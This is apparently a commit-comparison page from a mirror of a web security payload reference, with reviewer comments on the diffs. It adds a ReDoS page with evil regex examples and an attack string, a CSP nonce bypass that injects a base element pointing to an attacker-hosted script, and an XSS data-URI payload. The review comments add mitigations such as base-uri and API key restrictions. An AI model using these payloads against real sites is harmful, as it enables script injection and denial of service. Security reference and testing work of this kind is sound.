mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-05-09 03:26:07 +02:00
Compare commits
3 Commits
4ea1af213f
...
03b35031c4
Author | SHA1 | Date
---|---|---
Pol Lamothe | 03b35031c4 |
Swissky | 53d9014b2b |
Pol Lamothe | 443ce7a38a |
@ -75,6 +75,7 @@ Use : https://github.com/ozguralp/gmapsapiscanner/
Impact:
* Consuming the company's monthly quota or can over-bill with unauthorized usage of this service and do financial damage to the company
* Conduct a denial of service attack specific to the service if any limitation of maximum bill control settings exist in the Google account
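Review bot: the two impact bullets read awkwardly and the second one leaves its condition unclear. "Consuming the company's monthly quota or can over-bill with unauthorized usage" mixes a gerund with a verb phrase; suggest "Exhausting the company's monthly quota, or running up unauthorized charges that cause financial damage". In the second bullet the denial of service follows precisely when a maximum billing cap is configured: once an attacker's requests have consumed the cap, the service stops answering the legitimate application as well. Suggest "If a maximum billing cap is configured in the Google account, exhausting it denies the service to the legitimate application". A short mitigation line would also help readers who find such a key in their own code: restrict the key to the referrers, IP addresses or app identifiers that need it and to the specific APIs it uses, so a leaked key cannot be driven from arbitrary origins.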
@ -0,0 +1,36 @@
# Regular Expression
> Regular Expression Denial of Service (ReDoS) is a type of attack that exploits the fact that certain regular expressions can take an extremely long time to process, causing applications or services to become unresponsive or crash.
## Denial of Service - ReDoS
* [tjenkinson/redos-detector](https://github.com/tjenkinson/redos-detector) - A CLI and library which tests with certainty if a regex pattern is safe from ReDoS attacks. Supported in the browser, Node and Deno.
* [doyensec/regexploit](https://github.com/doyensec/regexploit) - Find regular expressions which are vulnerable to ReDoS (Regular Expression Denial of Service)
* [devina.io/redos-checker](https://devina.io/redos-checker) - Examine regular expressions for potential Denial of Service vulnerabilities
### Evil Regex
Evil Regex contains:
* Grouping with repetition
* Inside the repeated group:
* Repetition
* Alternation with overlapping
**Examples**
* `(a+)+`
* `([a-zA-Z]+)*`
* `(a|aa)+`
* `(a|a?)+`
* `(.*a){x}` for x \> 10
These regular expressions can be exploited with `aaaaaaaaaaaaaaaaaaaaaaaa!`
## References
* [Regular expression Denial of Service - ReDoS - OWASP - Adar Weidman](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)
* [OWASP Validation Regex Repository - OWASP](https://wiki.owasp.org/index.php/OWASP_Validation_Regex_Repository)
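Review bot: the example payload is given without the reason it works, which is the point a reader of this page needs. `aaaaaaaaaaaaaaaaaaaaaaaa!` is effective because the trailing `!` makes the overall match fail, and a backtracking engine then retries every way of splitting the run of `a`s between the nested quantifiers before it gives up; for `(a+)+` the number of splits grows exponentially with the input length, so a few dozen characters are enough, while an input that ends in a successful match does not trigger the blow-up. Suggest one sentence to that effect under **Examples**. Under **Evil Regex contains**, `Repetition` and `Alternation with overlapping` appear at the same level as their parent; they should be indented under `Inside the repeated group:`. The backslash in `for x \> 10` is unnecessary outside a code span; write `x > 10`. The section headed `## Denial of Service - ReDoS` contains only tooling, so `## Tools` would describe it better, and the page says nothing about mitigation: a line recommending a linear-time engine (RE2, Rust's `regex` crate) where the platform allows it, and input-length limits plus match timeouts where it does not, would balance the detection tooling.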
@ -81,6 +81,7 @@
- [Bypass CSP by Rhynorater](#bypass-csp-by-rhynorater)
- [Bypass CSP by @akita_zen](#bypass-csp-by-akita_zen)
- [Bypass CSP by @404death](#bypass-csp-by-404death)
- [Bypass CSP nonce by @PolLamothe](#bypass-csp-nonce-by-pollamothe)
- [Common WAF Bypass](#common-waf-bypass)
- [Cloudflare XSS Bypasses by @Bohdan Korzhynskyi](#cloudflare-xss-bypasses-by-bohdan-korzhynskyi)
- [25st January 2021](#25st-january-2021)
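Review bot: the new anchor `#bypass-csp-nonce-by-pollamothe` matches the slug GitHub derives from the heading `### Bypass CSP nonce by [@PolLamothe](https://github.com/PolLamothe)` (the `@` is dropped and the link text is kept), so the entry should resolve; it is also placed in the same order as the section it points to. While in this list, the adjacent entry `25st January 2021` should read `25th January 2021`, with its anchor and the heading it points to updated to match.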
@ -1148,6 +1149,20 @@ Works for CSP like `script-src 'self' data:` as warned about in the official [mo
<script src="data:,alert(1)">/</script>
```
### Bypass CSP nonce by [@PolLamothe](https://github.com/PolLamothe)
Works for CSP like `script-src 'nonce-RANDOM_NONCE'`
**This can work only if the site has a js file imported with a path that don't include the URL**. Like this : `<script src='/PATH.js'></script>`
You have to inject this html element :
```html
<Base Href=http://www.yoursite.com>
```
Now you have to host your custom js file at the same path that one of the website's script.
So the site will use this js file : `http://www.yoursite.com/PATH.js`
## Common WAF Bypass
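Review bot: the precondition that makes this section work is missing, and it is also the mitigation. An injected `<base href>` only changes where relative script URLs resolve when the policy has no `base-uri` directive; with `base-uri 'self'` (or `'none'`) the browser refuses the cross-origin base element and the nonce-protected `<script src='/PATH.js'>` keeps loading from the legitimate origin. State that in the opening line ("Works for CSP like `script-src 'nonce-RANDOM_NONCE'` without a `base-uri` directive"), since it is the one check a defender needs. One sentence on the mechanism would also help: the existing script tag already carries a valid nonce, so the policy allows it, and the base element merely redirects where its relative `src` is fetched from, which is why the nonce is not actually broken. Wording: "a path that don't include the URL" should be "a relative path (no scheme or host)", "Like this :" should be "like this:", and "the same path that one of the website's script" should be "the same path as one of the site's scripts"; the `<Base Href=http://www.yoursite.com>` example would read more clearly in lowercase with a quoted attribute value.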